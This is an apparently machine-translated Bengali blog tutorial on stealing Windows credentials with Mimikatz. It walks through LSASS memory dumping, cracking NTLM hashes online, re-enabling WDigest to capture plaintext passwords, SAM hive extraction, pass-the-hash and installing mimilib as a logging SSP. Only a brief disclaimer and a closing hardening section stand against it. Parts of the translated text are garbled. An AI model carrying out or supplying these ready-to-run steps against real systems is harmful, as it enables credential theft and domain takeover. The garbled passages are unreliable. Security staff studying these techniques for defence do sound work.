কম্পিউটার

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

এই নিবন্ধে, উইন্ডোজ সুরক্ষার জন্য উত্সর্গীকৃত একটি সিরিজের অংশ হিসাবে লেখা, আমরা মিমিকাটজ ব্যবহার করে সমস্ত সক্রিয় উইন্ডোজ ব্যবহারকারীদের পাসওয়ার্ড পাওয়ার জন্য বেশ সহজ পদ্ধতি শিখব। টুল.

Mimikatz.exe Windows মেমরি, পাসওয়ার্ড হ্যাশ, Kerberos টিকিট ইত্যাদি থেকে প্লেইন টেক্সট পাসওয়ার্ড বের করতে পারে। এছাড়াও, mimikatz আপনাকে পাস-দ্য-হ্যাশ, পাস-দ্য-টিকিট অ্যাটাক বা গোল্ডেন কারবেরস টিকিট তৈরি করতে দেয়। মিমিকাটজ কার্যকারিতা মেটাসপ্লয়েট ফ্রেমওয়ার্কেও উপলব্ধ।

আপনি mimikatz ডাউনলোড করতে পারেন GitHub রেপো থেকে:https://github.com/gentilkiwi/mimikatz/releases/। mimikatz_trunk.zip আর্কাইভটি C:\Tools\mimikatz-এ বের করুন। এই ডিরেক্টরিতে mimikatz-এর দুটি সংস্করণ প্রদর্শিত হবে – x64 এবং x86-এর জন্য। আপনার Windows bitness জন্য সংস্করণ ব্যবহার করুন.

এই নিবন্ধে, আমরা আপনাকে দেখাব কিভাবে Windows Server 2016 বা Windows 10-এ mimikatz ব্যবহার করে ব্যবহারকারীর পাসওয়ার্ড পেতে হয়।

অস্বীকৃতি। এই নিবন্ধে বর্ণিত তথ্য এবং প্রযুক্তিগুলি শুধুমাত্র তথ্যের উদ্দেশ্যে ব্যবহার করা উচিত এবং তৃতীয় পক্ষের অ্যাকাউন্ট, ডেটা এবং সিস্টেমগুলিতে অ্যাক্সেস পাওয়ার জন্য নয়।

LSASS-এ Mimikatz-এর মাধ্যমে Windows হ্যাশড পাসওয়ার্ড হ্যাক করা

উইন্ডোজ মেমরি (lsass.exe প্রসেস – লোকাল সিকিউরিটি অথরিটি সাবসিস্টেম সার্ভিস) থেকে উইন্ডোজ সার্ভার 2016 চলমান একটি RDS সার্ভারে লগ ইন করা সমস্ত ব্যবহারকারীর পাসওয়ার্ড হ্যাশ ডাম্প করার চেষ্টা করি।

এলিভেটেড কমান্ড প্রম্পটে নিম্নলিখিত কমান্ডগুলি চালান:

  1. Mimikatz.exe চালান একজন প্রশাসক হিসাবে;
  2. নিম্নলিখিত কমান্ডটি বর্তমান অ্যাকাউন্টকে ডিবাগ প্রক্রিয়া (SeDebugPrivilege) করার অনুমতি দেবে:
    privilege::debug
  3. সক্রিয় ব্যবহারকারী সেশনের তালিকা করুন:
    sekurlsa::logonPasswords full
  4. আমার ক্ষেত্রে আমার অ্যাকাউন্টের পাশাপাশি সার্ভারে দুটি ব্যবহারকারীর সক্রিয় সেশন রয়েছে:novach এবং administrator .
  5. তাদের NTLM হ্যাশ কপি করুন (স্ক্রিনশটে হাইলাইট করা হয়েছে)।
    Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং
আপনি মিমিকাটজ ব্যবহার করতে পারেন ইন্টারেক্টিভভাবে নয়, কিন্তু কমান্ড মোডে। স্বয়ংক্রিয়ভাবে ব্যবহারকারীর পাসওয়ার্ড হ্যাশ পেতে এবং একটি পাঠ্য ফাইলে রপ্তানি করতে, কমান্ডটি ব্যবহার করুন:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> c:\tmp\mimikatz_output.txt

এখন আপনি যেকোনো অফলাইন ব্যবহার করতে পারেন (একটি hashcat আছে কালি লিনাক্সে টুল) বা NTLM হ্যাশ ডিক্রিপ্ট করার জন্য একটি অনলাইন পরিষেবা। আমি https://crackstation.net/.

পরিষেবাটি ব্যবহার করব

আপনি দেখতে পাচ্ছেন, পরিষেবাটি দ্রুত এই NTLM হ্যাশগুলির জন্য মান খুঁজে পেয়েছে। সেগুলি, আমরা স্পষ্ট পাঠ্যে ব্যবহারকারীর পাসওয়ার্ড পেয়েছি৷

কল্পনা করুন এটি একটি RDS হোস্ট যার সাথে অনেক সমসাময়িক ব্যবহারকারী এবং একটি এন্টারপ্রাইজ অ্যাডমিনিস্ট্রেটর সেশন। সেগুলি, যদি আপনার এই সার্ভারে স্থানীয় প্রশাসক বিশেষাধিকার থাকে, আপনি এমনকি ডোমেন অ্যাডমিন পাসওয়ার্ডও পেতে পারেন৷

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

আপনি যদি Windows ব্যবহারকারীদের জন্য জটিল পাসওয়ার্ড ব্যবহার করেন, তাহলে সেগুলিকে ডিক্রিপ্ট করা অনেক বেশি কঠিন হবে। অতএব, সবসময় GPO এর মাধ্যমে পাসওয়ার্ড জটিলতা সক্ষম করুন এবং AD ডোমেনে পাসওয়ার্ডের শক্তি নিয়মিত অডিট করুন।

আপনি দেখতে পাচ্ছেন, মিমিকাটজকে ধন্যবাদ আমরা সমস্ত সক্রিয় ব্যবহারকারীদের এনটিএলএম হ্যাশ পেয়েছি! কমান্ডটি সফল হয়েছে কারণ এই কম্পিউটারে ডিবাগ মোড সক্ষম করা হয়েছে, যা আপনাকে SeDebugPrivilege সেট করতে দেয়। পছন্দসই প্রক্রিয়ার জন্য পতাকা। এই মোডে, প্রোগ্রামগুলি সিস্টেমের পক্ষ থেকে চালু করা প্রক্রিয়াগুলির মেমরিতে নিম্ন-স্তরের অ্যাক্সেস পেতে পারে৷

দ্রষ্টব্য . 2017 সালের জুন মাসে, অনেক দেশের অনেক বড় কোম্পানি NotPetya ransomware দ্বারা সংক্রমিত হয়েছিল, যা ব্যবহারকারী এবং ডোমেন অ্যাডমিনদের পাসওয়ার্ড সংগ্রহ করতে অন্তর্নির্মিত মিমিকাটজ মডিউল ব্যবহার করে।

উইন্ডোজ মেমরি ডাম্প থেকে কীভাবে ব্যবহারকারীর পাসওয়ার্ড পাবেন?

পাসওয়ার্ড হ্যাশ পাওয়ার উপরের পদ্ধতিটি কাজ করবে না যদি একটি অ্যান্টিভাইরাস সেই ব্লক ইনজেকশনটি ইনস্টল করা থাকে। এই ক্ষেত্রে, লক্ষ্য হোস্টে LSASS প্রক্রিয়ার একটি মেমরি ডাম্প তৈরি করতে হবে, এটি আপনার কম্পিউটারে অনুলিপি করতে হবে এবং mimikatz ব্যবহার করে পাসওয়ার্ড হ্যাশগুলি বের করতে হবে৷

উইন্ডোজে একটি প্রক্রিয়ার মেমরি ডাম্প তৈরি করা বেশ সহজ। টাস্ক ম্যানেজার শুরু করুন, lsass.exe প্রক্রিয়াটি সনাক্ত করুন, এটিতে ডান ক্লিক করুন এবং ডাম্প ফাইল তৈরি করুন নির্বাচন করুন .

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

উইন্ডোজ সিস্টেম32 ফোল্ডারে মেমরি ডাম্প সংরক্ষণ করবে।

আপনাকে শুধু mimikatz ব্যবহার করে ডাম্প ফাইল পার্স করতে হবে (আপনি অন্য কম্পিউটারে এই কাজটি সম্পাদন করতে পারেন)। মিমিকাটজে মেমরি ডাম্প লোড করুন:

Mimikatz “sekurlsa::minidump C:\Users\username\AppData\Local\Temp\lsass.DMP”

একটি ডাম্প থেকে ব্যবহারকারীর নাম এবং তাদের পাসওয়ার্ড হ্যাশ পান:

# sekurlsa::logonPasswords

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

আপনি একটি দূরবর্তী কম্পিউটার থেকে psexec ব্যবহার করে একটি মেমরি ডাম্প পেতে পারেন, বা WinRM এর মাধ্যমে (যদি আপনার প্রশাসকের বিশেষাধিকার থাকে), এবং এটি থেকে ব্যবহারকারীর পাসওয়ার্ড বের করতে পারেন৷

এছাড়াও আপনি procdump ব্যবহার করতে পারেন ডাম্প পেতে Sysinternals থেকে টুল:

procdump -ma lsass.exe lsass.dmp

PowerShell-এ Out-Minidump.ps1 ফাংশন দিয়ে LSASS প্রক্রিয়ার মেমরি ডাম্প পাওয়া যেতে পারে। PoSh সেশনে আউট-মিনিডাম্প ফাংশন আমদানি করুন এবং LSASS প্রক্রিয়ার একটি মেমরি ডাম্প তৈরি করুন:

Import-Module .\OutMiniDump.ps1
Get-Process lsass | Out-Minidump

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

Hyberfil.sys এবং VM পৃষ্ঠা ফাইলগুলি থেকে উইন্ডোজ পাসওয়ার্ড বের করা

মেমরি ডাম্প ফাইল, সিস্টেম হাইবারনেশন ফাইল (hiberfil.sys) থেকে ব্যবহারকারীর পাসওয়ার্ড বের করাও সম্ভব। ভার্চুয়াল মেশিন ফাইলের vmem (ভার্চুয়াল মেশিন পেজিং ফাইল এবং তাদের স্ন্যাপশট)।

এটি করতে, আপনার প্রয়োজন Windows এর জন্য ডিবাগিং টুল৷ (WinDbg), mimikatz নিজেই এবং একটি টুল .vmem কে একটি মেমরি ডাম্প ফাইলে রূপান্তর করতে (হাইপার-ভিতে, এটি vm2dmp.exe বা VMWare vmem-ফাইলের জন্য MoonSols Windows মেমরি টুলকিট হতে পারে)।

উদাহরণস্বরূপ, একটি VMWare ভার্চুয়াল মেশিনের একটি vmem পৃষ্ঠা ফাইলকে ডাম্পে রূপান্তর করতে, এই কমান্ডটি ব্যবহার করুন:

bin2dmp.exe "wsrv2008r2-1.vmem" vmware.dmp

ডাম্পটি WinDbg এ আমদানি করুন (ফাইল -> ওপেন ক্র্যাশ ডাম্প), mimikatz লাইব্রেরি mimilib.dll লোড করুন:

.load mimilib.dll

ডাম্পে lsass.exe প্রক্রিয়া খুঁজুন:

!process 0 0 lsass.exe

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

এবং অবশেষে, টাইপ করুন:

.process /r /p fffffa800e0b3b30
!mimikatz

ফলস্বরূপ, আপনি উইন্ডোজ ব্যবহারকারীদের একটি তালিকা এবং তাদের পাসওয়ার্ডের NTLM হ্যাশ, এমনকি পাঠ্য পাসওয়ার্ডগুলিও পরিষ্কার করতে পারবেন৷

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

WDigest ব্যবহার করে ক্লিয়ার-টেক্সটে উইন্ডোজ পাসওয়ার্ড বের করা

আপনি WDigest ব্যবহার করতে পারেন লিগ্যাসি উইন্ডোজ সংস্করণে HTTP ডাইজেস্ট প্রমাণীকরণের জন্য প্রোটোকল। এই প্রোটোকলের প্রধান নিরাপত্তা ত্রুটি হল যে এটি হ্যাশের পরিবর্তে ব্যবহারকারীর পাসওয়ার্ড মেমরিতে পরিষ্কার পাঠে সংরক্ষণ করে। Mimikatz আপনাকে LSASS.EXE প্রক্রিয়ার মেমরি থেকে এই পাসওয়ার্ডগুলি বের করার অনুমতি দেয়৷

Windows 10 এবং Windows Server 2016/2019 সহ Windows-এর সমস্ত নতুন সংস্করণে WDigest প্রোটোকল ডিফল্টরূপে নিষ্ক্রিয় থাকে। কিন্তু পুরোপুরি সরানো হয়নি। উইন্ডোজে আপনার স্থানীয় প্রশাসকের অনুমতি থাকলে, আপনি WDiget প্রোটোকল সক্ষম করতে পারেন, ব্যবহারকারীদের লগ ইন করার জন্য অপেক্ষা করুন এবং তাদের পাসওয়ার্ড চুরি করুন৷

উইন্ডোজে Wdigest সক্ষম করুন:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

গ্রুপ নীতি সেটিংস রিফ্রেশ করুন:

gpupdate /force

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

ব্যবহারকারীদের লগ ইন করার জন্য অপেক্ষা করুন এবং mimikatz-এর মাধ্যমে তাদের পাসওয়ার্ডগুলি পান (ব্যবহারকারীকে Windows 10-এ পুনরায় লগইন করতে হবে; Windows Server 2016-এ, স্ক্রীন লক হওয়ার পরে এটি সেশন আনলক করার জন্য যথেষ্ট):

privilege::debug
sekurlsa::wdigest

আপনি দেখতে পাচ্ছেন, ডাইজেস্ট বিভাগে ব্যবহারকারীর পাসওয়ার্ড স্পষ্ট পাঠ্যে রয়েছে:

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

SAM থেকে স্থানীয় ব্যবহারকারীর পাসওয়ার্ড হ্যাশ বের করা হচ্ছে

mimikatz-এর সাহায্যে, আপনি SAM থেকে স্থানীয় উইন্ডোজ ব্যবহারকারীদের (বিল্ট-ইন অ্যাডমিনিস্ট্রেটর অ্যাকাউন্ট সহ) পাসওয়ার্ড হ্যাশগুলি বের করতে পারেন:

privilege::debug
token::elevate
lsadump::sam

আপনি রেজিস্ট্রি SAM হাইভ থেকে NTLM হ্যাশগুলিও বের করতে পারেন।

  1. ফাইলগুলিতে সিস্টেম এবং SAM রেজিস্ট্রি হাইভস রপ্তানি করুন:
    reg save hklm\sam c:\tmp\sam.hiv
    reg save hklm\security c:\tmp\sec.hiv

    Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং
  2. তারপর পাসওয়ার্ড হ্যাশগুলি ডাম্প করতে Mimikatz ব্যবহার করুন:
    privilege::debug
    token::elevate
    lsadump::sam c:\tmp\sam.hiv c:\tmp\sec.hiv

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

মিমিকাটজের মাধ্যমে পাস-দ্য-হ্যাশ আক্রমণ সম্পাদন করা

যদি ব্যবহারকারীর একটি শক্তিশালী পাসওয়ার্ড থাকে এবং আপনি দ্রুত এটি NTLM হ্যাশ ডিক্রিপ্ট করতে না পারেন, তাহলে Mimikatz একটি পাস-দ্য-হ্যাশ (হ্যাশ পুনঃব্যবহার) আক্রমণ করতে ব্যবহার করা যেতে পারে। এই ক্ষেত্রে, হ্যাশ টার্গেট ব্যবহারকারীর পক্ষে প্রসেস চালানোর জন্য ব্যবহার করা যেতে পারে। উদাহরণস্বরূপ, আপনি যদি একজন ব্যবহারকারীর পাসওয়ার্ডের NTLM হ্যাশ ডাম্প করেন, নিম্নলিখিত কমান্ডটি সেই অ্যাকাউন্টের অধীনে একটি কমান্ড প্রম্পট চালাবে:

privilege::debug
sekurlsa::pth /user:Administrator /domain:woshub /ntlm:e91ccf23eeeee21a12b6709de24aa42 /run:powershell.exe

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

এছাড়াও, আপনি Invoke-TheHash ব্যবহার করতে পারেন দূরবর্তী যাত্রীদের উপর কমান্ড চালানোর জন্য NTLM শংসাপত্র পুনরায় ব্যবহার করার জন্য টুল।

উইন্ডোজ ক্রেডেনশিয়াল ম্যানেজার থেকে পাসওয়ার্ড ডাম্প করা

Windows-এ, আপনি Windows Credential Manager-এ পাসওয়ার্ড সংরক্ষণ করতে পারেন (এগুলি TERMSRV/hostname1-এ দূরবর্তী কম্পিউটার, ওয়েবসাইট, RDP শংসাপত্র অ্যাক্সেস করার জন্য পাসওয়ার্ড হতে পারে। বিন্যাস)। Mimikatz ক্রেডেনশিয়াল ম্যানেজার থেকে এই পাসওয়ার্ডগুলি বের করতে পারে এবং সেগুলি আপনাকে দেখাতে পারে:

privilege::debug
sekurlsa::credman

আপনি দেখতে পাচ্ছেন, সংরক্ষিত পাসওয়ার্ডটি credman-এর অধীনে দেখানো হয়েছে বিভাগ।

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

উইন্ডোজ অটোলগন পাসওয়ার্ডগুলি রেজিস্ট্রিতে পরিষ্কার পাঠে সংরক্ষণ করা হয়। সংরক্ষিত Wi-Fi পাসওয়ার্ড বের করাও সহজ।

Windows Logon Passwords ডাম্পিং ক্লিয়ার টেক্সটে

উইন্ডোজে পাসওয়ার্ড ডাম্প করার আরেকটি আকর্ষণীয় উপায় হল mimikatz দ্বারা চালিত একটি অতিরিক্ত SSP প্রদানকারী (সিকিউরিটি সাপোর্ট প্রোভাইডার) ব্যবহার করা।

  1. C:\Windows\System32\; ফোল্ডারে Mimikatz লাইব্রেরি ফাইল mimilib.dll অনুলিপি করুন;
  2. কমান্ড দিয়ে একটি অতিরিক্ত SPP প্রদানকারীকে নিবন্ধন করুন:
    reg add "hklm\system\currentcontrolset\control\lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
  3. যখন প্রতিটি ব্যবহারকারী উইন্ডোজে লগ ইন করে, তাদের পাসওয়ার্ড kiwissp.log ফাইলে লেখা হবে। আপনি PowerShell ব্যবহার করে সমস্ত পাসওয়ার্ড প্রদর্শন করতে পারেন:
    Get-Content C:\Windows\System32\kiwissp.log< /li>

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

শংসাপত্রের ডাম্পিং আক্রমণের বিরুদ্ধে উইন্ডোজকে রক্ষা করুন

Windows 8.1 এবং Windows Server 2012 R2 (এবং নতুন) এ LSASS থেকে পাসওয়ার্ড চুরি করার ক্ষমতা সীমিত। ডিফল্টরূপে এই উইন্ডোজ সংস্করণগুলিতে এলএম হ্যাশ এবং পাসওয়ার্ডগুলি মেমরিতে সংরক্ষণ করা হয় না৷

একই কার্যকারিতা উইন্ডোজ (7/8/2008R2/2012) এর পূর্ববর্তী সংস্করণগুলিতে ব্যাকপোর্ট করা হয়েছে, যেখানে আপনাকে একটি বিশেষ আপডেট ইনস্টল করতে হবে KB2871997 (আপডেটটি সিস্টেমের নিরাপত্তা বাড়ানোর জন্য অন্যান্য বিকল্প সরবরাহ করে) এবং রেজিস্ট্রি কী HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest-এ DWORD প্যারামিটার সেট করুন UseLogonCredential প্রতি 0 (WDigest অক্ষম করা হয়েছে)।

আপনি যদি এই আপডেট এবং UseLogonCredential কী ইনস্টল করার পরে মেমরি থেকে পাসওয়ার্ড বের করার চেষ্টা করেন, তাহলে আপনি দেখতে পাবেন যে mimikatz creds_wdigest কমান্ড ব্যবহার করে পাসওয়ার্ড এবং হ্যাশ ডাম্প করতে পারে না।

Mimikatz এর সাথে উইন্ডোজ মেমরি থেকে ব্যবহারকারীর পাসওয়ার্ড ডাম্পিং

উপরে, আমরা দেখিয়েছি কিভাবে আপনি সহজেই এই reg কীটিকে একটি দুর্বল মান সেট করতে পারেন, যদি আপনার স্থানীয় প্রশাসকের অনুমতি থাকে। এর পরে, আপনি আবার LSA মেমরিতে পাসওয়ার্ডগুলি অ্যাক্সেস করতে পারেন।

মিমিকাটজে, মেমরি থেকে পাসওয়ার্ড এবং তাদের হ্যাশগুলি পাওয়ার জন্য অন্যান্য বিকল্প রয়েছে (WDigest, LM-hash, NTLM-hash, Kerberos টিকেট ক্যাপচার করার মডিউল)। তাই সুরক্ষার জন্য নিম্নলিখিত নিরাপত্তা ব্যবস্থাগুলি বাস্তবায়ন করার পরামর্শ দেওয়া হচ্ছে:

  • প্রত্যাবর্তনযোগ্য এনক্রিপশন ব্যবহার করে পাসওয়ার্ড সংরক্ষণ করা প্রতিরোধ করুন;
  • WDigest নিষ্ক্রিয় করুন;
  • ক্রেডেনশিয়াল ম্যানেজারে পাসওয়ার্ড সংরক্ষণ করা প্রতিরোধ করুন;
  • NTLM নিষ্ক্রিয় করুন;
  • ডোমেন ব্যবহারকারীর শংসাপত্রের ক্যাশিং প্রতিরোধ করুন (CachedLogonsCount দ্বারা রেজিস্ট্রি প্যারামিটার বা গ্রুপ নীতি বিকল্প ইন্টারেক্টিভ লগইন নীতি:ক্যাশে পূর্ববর্তী লগনের সংখ্যা );
  • যদি ডোমেনের কার্যকরী স্তরটি Windows Server 2012 R2 বা নতুন হয়, তাহলে আপনি প্রশাসক অ্যাকাউন্টগুলিকে বিশেষ সুরক্ষিত ব্যবহারকারীদের সাথে যুক্ত করতে পারেন গ্রুপ এই ক্ষেত্রে, এই ধরনের ব্যবহারকারীদের জন্য NTLM হ্যাশ তৈরি করা হবে না।
  • LSA প্রক্রিয়া সুরক্ষা সক্ষম করুন:reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 00000001 /f (এই সেটিংটি শুধুমাত্র Microsoft স্বাক্ষরিত প্রক্রিয়াগুলিকে LSASS মেমরি অ্যাক্সেস করার অনুমতি দেবে, আপনি GPO এর মাধ্যমে ডোমেনে এই রেগ কী স্থাপন করতে পারেন);
  • প্রক্রিয়ার LSA বিষয়বস্তু সুরক্ষিত করতে ক্রেডেনশিয়াল গার্ড ব্যবহার করুন;
  • এমনকি স্থানীয় প্রশাসকদের জন্যও ডিবাগ সুবিধা পেতে বাধা দিন:GPO -> উইন্ডোজ সেটিংস -> নিরাপত্তা সেটিংস -> স্থানীয় নীতি -> ব্যবহারকারীর অধিকার অ্যাসাইনমেন্ট -> ডিবাগ প্রোগ্রাম (তবে, আপনার লোকালসিস্টেম অনুমতি থাকলে বা এটির মতো থাকলে এটি সহজেই বাইপাস হয়ে যায়)
টিপ . কিভাবে পাসওয়ার্ড এবং হ্যাশ বের করা থেকে উইন্ডোজের মেমরি রক্ষা করা যায় সে সম্পর্কে একটি বিস্তারিত নিবন্ধ – উইন্ডোজ ডোমেনে মিমিকাটজ থেকে রক্ষা করার পদ্ধতি।

সিদ্ধান্ত। আবারও, আমরা আপনাকে কিছু মূল নিরাপত্তা ধারণার কথা মনে করিয়ে দিচ্ছি।

  • বিভিন্ন পরিষেবার জন্য একই পাসওয়ার্ড ব্যবহার করবেন না (বিশেষ করে, তৃতীয় পক্ষের মালিকানাধীন RDP/RDS হোস্ট অ্যাক্সেস করার জন্য);
  • ক্লাউডের ভার্চুয়াল মেশিনে সংরক্ষিত আপনার পাসওয়ার্ড এবং ডেটার নিরাপত্তার কথা চিন্তা করুন, কারণ ভার্চুয়াল মেশিনের ফাইলগুলি যে হাইপারভাইজার এবং স্টোরেজগুলিতে রয়েছে সেখানে আর কার অ্যাক্সেস আছে তা আপনি নিশ্চিত করতে পারবেন না;
  • গ্লোবাল বা স্থানীয় অ্যাডমিনিস্ট্রেটর বিশেষাধিকার আছে এমন অ্যাকাউন্টের সংখ্যা কমিয়ে দিন (উইন্ডোজ পরিবেশে অ্যাডমিনিস্ট্রেটর অ্যাকাউন্ট সুরক্ষিত করার নির্দেশিকা দেখুন);
  • অন্যান্য ব্যবহারকারীদের অ্যাক্সেসযোগ্য সার্ভার এবং কম্পিউটারগুলিতে ডোমেন অ্যাডমিন অ্যাকাউন্টের অধীনে কখনই লগ ইন করবেন না৷


  1. Windows 11/10 এ Memtest86+ এর সাথে উন্নত মেমরি ডায়াগনস্টিক

  2. উইন্ডোজ 10 থেকে আইফোনে 3টি পদ্ধতি সহ ভিডিওগুলি কীভাবে স্থানান্তর করবেন?

  3. উইন্ডোজ 10 এ ডেস্কটপ আইকন পরিবর্তন করা থেকে ব্যবহারকারীকে আটকান

  4. PCUnlocker দিয়ে Windows 10 ভুলে যাওয়া পাসওয়ার্ড পুনরুদ্ধার করুন